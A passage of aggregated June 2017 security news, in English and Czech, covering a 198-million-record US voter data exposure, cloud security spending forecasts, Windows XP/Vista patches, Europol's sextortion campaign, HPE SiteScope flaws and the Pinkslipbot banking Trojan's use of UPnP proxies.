However, the server was secured two days later after Vickery responsibly reported the blunder to the federal regulators.
You would be surprised to know that the Republican National Committee paid Deep Root nearly a Million dollars between January 2015 and November 2016 for their work during the election and another $4.2 Million to TargetPoint.
It is believed that the US voters data was also compiled by at least two other contractors, TargetPoint Consulting Inc. and Data Trust.
According to the report, a smaller folder for the 2016 election included in the database contained files for Ohio and Florida, arguably the two most crucial battleground states.
Another folder named 'data_trust' appears to reference Data Trust, was entirely downloadable by any individual accessing the URL of the database and contained two massive stores of personal information collectively representing 198 million potential voters.
"Consisting primarily of two file repositories, a 256 GB folder for the 2008 presidential election and a 233 GB folder for 2012, each containing fifty-one files - one for every state, as well as the District of Columbia," explained UpGuard's Dan O'Sullivan in a blog post.
Also, one folder called "Post-Elect 2016" contained information on voters’ likely views about topics like whether they voted for former President Barack Obama and US President Donald Trump’s "America First" foreign policy.
Deep Root has contracted a security firm, Stroz Friedberg, to perform a thorough investigation of the data exposure.


Výdaje na ochranu cloudů rostou vůbec nejrychleji

19.6.2017 SecurityWorld Zabezpečení
Oblast cloudových bezpečnostních služeb poroste nadále rychlým tempem – v roce 2017 dosáhne podle společnosti Gartner celkového objemu 5,9 miliardy dolarů, což je o 21 % víc než v roce 2016.
Celkově poroste segment cloudových bezpečnostních služeb rychleji než celý trh informační bezpečnosti. Analytici společnosti Gartner odhadují, že globální trh cloudových bezpečnostních služeb naroste do roku 2020 bezmála na 9 miliard dolarů (viz tabulka).

SIEM (Security Information and Event Management), IAM (Identity and Access Management) a nově se rodící technologie jsou nejrychleji rostoucími segmenty cloudových bezpečnostních služeb

„Zabezpečení emailu, webu a oblast IAM zůstávají ve firmách třemi hlavními cloudovými prioritami,“ říká Ruggero Contu, ředitel výzkumu společnosti Gartner.

Služby zabezpečující tyto priority, včetně řešení SIEM, a také další nové typy služeb mají největší předpoklady k růstu. Mezi tyto nově se objevující a rychle rostoucí služby patří využívání zpráv o nových hrozbách (threat intelligence enablement), cloudová pískoviště pro malware (tzv. sandboxing), šifrování dat v cloudu, správa ochrany koncových bodů, informace o hrozbách a webové aplikační firewally (WAF).

Cloudové bezpečnostní služby

Odhad vývoje trhu (miliony dolarů)

Segment
2016
2017
2018
2019
2020
Bezpečné e-mailové brány
654,9
702,7
752,3
811,5
873,2
Bezpečené webové brány
635,9
707,8
786,0
873,2
970,8
IAM, IDaaS, ověřování uživatelů
1 650,0
2 100,0
2 550,0
3 000,0
3 421,8
Vzdálené vyhodnocování zranitelností
220,5
250,0
280,0
310,0
340,0
SIEM
286,8
359,0
430,0
512,1
606,7
Bezpečnostní testování aplikací
341,0
397,3
455,5
514,0
571,1
Další cloudové bezpečnostní služby
1 051,0
1 334,0
1 609,0
1 788,0
2 140,0
Celkem
4 840,1
5 850,8
6 862,9
7 808,8
8 923,6
IDaaS = správa identit a přístupových práv jako služba (identity and access management as a service)


Nebezpečné chyby ohrožují uživatele Windows XP i Vista

19.6.2017 Novinky/Bezpečnost Zranitelnosti
Společnost Microsoft ukončila v letošním roce podporu pro operační systém Windows Vista, podobně jako tomu bylo před lety v případě populárních xpéček. Ani pro jeden systém tak už neměly vycházet aktualizace. Kvůli nově objeveným nebezpečným chybám se však americký softwarový gigant rozhodl udělat výjimku a opravy „Nové aktualizace Windows opravují chybu v zabezpečení umožňující vzdálenému útočníkovi spustit na cílovém počítači libovolný kód,“ varoval Pavel Bašta, analytik Národního bezpečnostního týmu CSIRT.CZ.

To jinými slovy znamená, že na napadený stroj mohou kyberzločinci propašovat prakticky jakýkoli virus. Uživatel o tom nemusí vůbec vědět.

Právě závažnost nově objevených trhlin je patrně jedním z hlavních důvodů, proč se americký softwarový gigant rozhodl vydat aktualizace i pro již nepodporované systémy. Vedle Windows XP je řeč také o Vistách, pro které podpora skončila už letos v dubnu.

Pro Windows XP vydal Microsoft mimochodem aktualizaci už letos v květnu. Tehdy kvůli škodlivému kódu WannaCry, jež se začal internetem šířit doslova jako lavina. Za pouhých pár dní napadl přes 300 000 počítačů ve více než 150 zemích světa.

S ohledem na možná rizika by uživatelé neměli s instalací aktualizací otálet. Stahovat opravy je možné prostřednictvím služby Windows Update, která je součástí operačního systému Windows.

Podpora skončila, systém nikoliv
Ukončení podpory ze strany Microsoftu neznamená, že by operační systém přestal ze dne na den fungovat. S trochou nadsázky se dá říci, že Windows XP i Visty jsou nesmrtelné. Pokud o to uživatelé budou stát, mohou na počítačích fungovat klidně další desítky let.

Microsoft samotnou funkčnost nijak neomezil, vše funguje jako před ukončením podpory. Problém však představuje absence bezpečnostních záplat. Riziko nákazy počítačovým virem je ale například u xpéček až šestkrát vyšší než u osmiček a ještě mnohonásobně vyšší než u aktuálně nabízených desítek.

Vhodným řešením je tak z bezpečnostního hlediska přechod na novější systém. Vybírat uživatelé přitom nemusejí pouze ze stáje Windows – k dispozici mají i řadu bezplatných alternativ.


Europol Calls for Action Against Sextortion

19.6.2017 securityweek Crime
Online sextortion against children is extensive, under-reported, poorly understood, and growing. In response, Europol has simultaneously published a report with recommendations on how to tackle the problem, and launched a 'Say No' awareness campaign.

"Children are increasingly using the online environment to communicate and form relationships and this should be considered as a natural part of their development," explains Steven Wilson, head of Europol's European Cybercrime Centre. However, it is our collective responsibility to educate them on the threats they may experience and also protect them to make the online environment as safe as possible. Where something untoward happens online we should provide clear and effective reporting and support mechanisms so they understand where to turn to for assistance."

The Say No campaign is launched in conjunction with a report (PDF) published Friday, which calls for awareness programs that differentiate between acceptable and unacceptable online communication to be included in school curricula. The difference between acceptable and unacceptable behavior (from a legal perspective as opposed to a moral perspective) is part of the problem.

The nature of the problem is also explored using information collected by the US National Center for Missing and Exploited Children's CyberTipline cybertipline. It shows that female child victims are being blackmailed more significantly for sexually explicit material (84%) compared to their male counterparts (53%). The latter are more commonly targeted for financial gain (32% compared to 2% for female child victims) -- which is a relatively new trend in online child sexual abuse. Another trend is the perpetrator's demand for the targeted child to include other children, such as siblings or peers.

Europol is calling for more academic research into the problem -- starting with a common international nomenclature. "One major limitation of the current capacity to assess the true nature of and successfully combat oSCEC is the lack of a common language and understanding of this phenomenon on the part of different stakeholders, such as legal and judicial systems, law enforcement and the private sector, including the media."

An immediate example is Europol's use of the term oSCEC (the online sexual coercion and extortion of children) for what the media and most people simply term, 'sextortion'. Another related example can be seen in Europe's use of the term 'child abuse' for what America normally calls 'child pornography'. Europol is concerned that the term 'sextortion' can imply "equivalence with the crime affecting adults, and may lead to a failure to recognize more complex and nuanced features of the crime affecting children and its grave consequences for them." A similar argument applies to the use of the term 'child pornography' (always illegal) and the often legal (adult) pornography.

The poor understanding of oSCEC is almost certainly supported by under-reporting by victims. Europol wants to tackle the former by increased research, including in terms of victim and perpetrator characteristics. For example, notes the report, "As the financial victimization of children is a comparatively new trend in online child sexual abuse and exploitation (CSAE) further empirical work is required to identify particular factors at play that render young people vulnerable to financial exploitation."

It wishes to tackle the latter by increased cooperation between stakeholders (including increased monitoring by platform providers), examining national laws to determine "whether the current legislation can cope with the complexities of oSCEC, whether it is complementary and whether it is sufficient to ensure appropriate prosecution;" and through the launch of the Europol 'Say No' campaign.

Part of the solution will come naturally from better understanding the problem. "The complex and dynamic nature of online unlawful behavior," says the report, "causes shortcomings in the recording of incidents of oSCEC which creates difficulties in assessing the scope of this crime threat."

But there is also a current lack of 'preventive intervention'. Europol's recommendation is for "effective, tailor-made awareness programs to make children and young people aware of acceptable and unacceptable online communication, including the illegality of some online practices, with a particular focus on those in the peer environment. Such programs should be included in school curricula."

The necessary research and the development of the programs that Europol recommends will take time, and in the meantime young children remain at risk. "Protecting our children is one of the highest priorities for law enforcement in Europe and across the world," comments Rob Wainwright, Europol's executive director. "At Europol, we are committed to tackle any threat to our children and bring anyone who harms them to justice."

Europol's Say No campaign aims to deliver immediate help to both existing and potential victims of oSCEC. Drawing on information from the UK NCA CEOP Commands education program, it helps young people to understand what is happening, to stop what is happening, and to report and get help for what has happened.


Workarounds Provided for HPE SiteScope Vulnerabilities

19.6.2017 securityweek Vulnerebility
Several potentially serious vulnerabilities have been found in HPE SiteScope, and while patches are not available, users can apply workarounds to prevent attacks.

HPE SiteScope is an agentless performance and availability monitoring software for distributed IT infrastructures, including servers, network services, applications, and operating systems.

While conducting a security assessment, expert Richard Kelley identified several vulnerabilities in version 11.31.461 of the product.

Kelley noticed that a critical remote code execution vulnerability disclosed in 2012 and for which a Metasploit module is available still hasn’t been patched by HPE. The vendor noted that users can prevent attacks by setting a specific flag in the “groups/master.config” file to disable old APIs.

A Shodan search conducted by Kelley showed that there are at least 230 SiteScope servers accessible on the Internet.

“I wonder how many admins know about this setting, and why wouldn’t HPE just remove the old APIs from new versions if they are no longer needed?” the researcher said in a blog post.

The expert also discovered that credentials stored in configuration files are encrypted, but the encryption key is hardcoded, allowing an attacker to obtain the password needed to log in to the SiteScope interface with administrator privileges.

Once the attacker has access to the administration interface, they can obtain credentials for Linux and Windows servers monitored via SiteScope. While the admin interface only displays passwords as dots, the actual password is transmitted in clear text over an unsecure connection to the client, allowing a man-in-the-middle (MitM) attacker to easily obtain the information.

Kelley also discovered the existence of a proprietary encryption scheme that uses a hardcoded private key. He determined that this function had still been used to encrypt some configuration data.

HPE said it plans on addressing the insecure transmission of credentials sometime in the third quarter. As for the encryption-related issues, the company pointed out that the problems are covered in chapter 20 of the SiteScope deployment guide.

While HPE has asked the researcher to delay disclosure until the third quarter, Kelley and CERT/CC have decided to make the flaws public to “encourage HPE to provide defender mitigations as soon as possible.”

CERT/CC has published an advisory containing mitigation advice for the unpatched vulnerability.

It’s not uncommon for HPE to provide workarounds for SiteScope vulnerabilities instead of releasing patches. In October 2015, Rapid7 disclosed the details of a command injection flaw that had also been addressed in the product documentation.


DRA firm left 1.1 TB of data unsecured on an Amazon S3, 198 million US voter records exposed
19.6.2017 securityaffairs Incindent
The popular security expert Chris Vickery revealed the DRA firm left 1.1 TB of data unsecured on an Amazon S3, 198 million US voter records exposed.
Researcher Chris Vickery has found nearly 200 million voter records in an unsecured Amazon S3 bucket maintained by Deep Root Analytics (DRA), it is the largest exposure of its kind in history.
The records include the voter’s first and last name, home and mailing address, date of birth, phone number, party affiliation, ethnicity, voter registration data, and a flag should the person appear on the federal Do-Not-Call registry.

The voter files also include other attributes that could have been used for analysis based on ethnicity and religion.

In 2015, Vickery discovered an archive exposed online containing 191 million voter records.

DRA is a Republican big data analytics firm, the popular expert discovered the huge trove of data on June 12, then he reported the issue to the authorities and the company secured it in two days.

The archive contains complete voter files compiled by DRA and at least two other contractors, Target Point Consulting Inc. and Data Trust.

Voter information is considered public, but sometimes it is not easy to access them even if they are freely available. Anyway, it is forbidden the use of such data for commercial purposes.

The archive discovered by Vickery on the DRA S3 bucket (“data_trust”) contains a collection of personal information representing between 150 to 198 million potential voters.

“Salted Hash has seen an example voter record, and many of the profile fields are similar to those from two years ago.” reported Salted Hash.

“Using an internal “RNC ID” – each voter in the database can be uniquely identified and associated with the logged data points.”

The archive discovered by Vickery contains information on 2008, 2012, while data related to 2016 are associated only with details on voters in Ohio and Florida.

Vickery also found another folder in the S3 bucket belonging to Target Point. The records included in the folder used the same “RNC ID” for each voter, but the update timestamps are recent (January 2017).

According to UpGuard’s Dan O’Sullivan, data discovered by the expert “provide a rare glimpse in to a systematic large-scale analytics operation.”

“The result is a database of frightening scope and intrusiveness into the modeled personal and political preferences of most of the country – adding up in total to an unsecured political treasure trove of data which was free to download online.”

Many of the Target Point data were focused on post-election data, they included scores for potential voters on specific topics.

“For example, one 50 GB file contained scores for potential voters, signifying their potential to support a given policy, such as President Trump’s foreign policy stance of “America First”, or how concerned they’ll be with auto manufacturing as an issue.” states Salted Hash.

The discovery highlights the risks for organizations in using cloud storage without implementing necessary security policies.

Amazon offers several tools and the guidance to secure the infrastructure of its customers, but evidently it is not enough.

Chris Vickery discovered many other clamorous cases of open database exposed on the Internet. In December 2015 the security expert discovered 191 million records belonging to US voters online, in April 2016 he also discovered a 132 GB MongoDB database open online and containing 93.4 million Mexican voter records.

In March 2016, Chris Vickery has discovered online the database of the Kinoptic iOS app, which was abandoned by developers, with details of over 198,000 users.

In January 2017, the expert discovered online an open Rsync server hosting the personal details for at least 200,000 IndyCar racing fans.

In March, he announced a 1.37 billion records data leak.


Pinkslipbot banking Trojan exploiting infected machines as control servers
19.6.2017 securityaffairs
Virus
Pinkslipbot banking Trojan is a banking Trojan that uses a complicated multistage proxy for HTTPS-based control server communication.
Security researchers at McAfee Labs have spotted a new strain of the Pinkslipbot banking malware (also known as QakBot/QBot) that leverages UPnP to open ports, allowing incoming connections from anyone on the Internet to communicate with the infected machine even if they are behind a network address translation router.

“To do so, Pinkslipbot uses universal plug and play (UPnP) to open ports, allowing incoming connections from anyone on the Internet to communicate with the infected machine. As far as we know, Pinkslipbot is the first malware to use infected machines as HTTPS-based control servers and the second executable-based malware to use UPnP for port forwarding after the infamous W32/Conficker worm in 2008.” states the analysis shared by Mcafee.

Pinkslipbot, aka, Qbot first appeared in 2009 when was detected by Symantec, recent variants implement new features, including an advanced evasion technique.

Qbot, is a data stealer worm with backdoor capabilities, it is used to recruit infected machines in a credential-harvesting botnet.

Experts noticed that Pinkslipbot uses UPnP to provide the path to the targets, it infects machines that provide HTTPS servers from IP addresses listed in the malware. These machines serve as HTTPs proxies that route the path to an additional layer of HTTPs proxies, this technique allows masquerading the IP address of the real C&C server.

“We have discovered that the list of IP addresses consists solely of infected machines that serve as HTTPS-based proxies to the actual control servers. This setup (shown in the following diagram) is used to mask the real IP addresses of the Pinkslipbot control servers.” states the analysis.

Pinkslipbot malware

The malware checks the target’s connection using a Comcast Internet speed tester, the test is possible only with US IP addresses. If the target passes the speed test, the malware then taps on UPnP ports to check the available services. The malicious code checks 27 ports to see if it can map them to the outside world.

It is still unclear the exact procedure of determining whether an infected machine is eligible to be a control server proxy.

“Malware researchers believe the choice depends on an infected machine’s satisfying a combination of three factors.

IP address located in North America
High-speed Internet connection
Capability to open ports on an Internet gateway device using UPnP”
Once detected available ports, the malware infects a machine behind the firewall and establish a permanent port mapping to route the traffic, and works as a C&C proxy.

Infected machines at the first level of proxy use the libcurl library to pass information to the second-layer which then route the traffic to the “real” C&C servers.

“Once the infected machine receives a control server request from a new Pinkslipbot infection, it routes all traffic to the real control servers via an additional proxy using the popular libcurl URL transfer library. ” continues the analysis.

To prevent Pinkslipbot infection users should “keep tabs on their local port-forwarding rules” and should turn UPnP off if they don’t need it.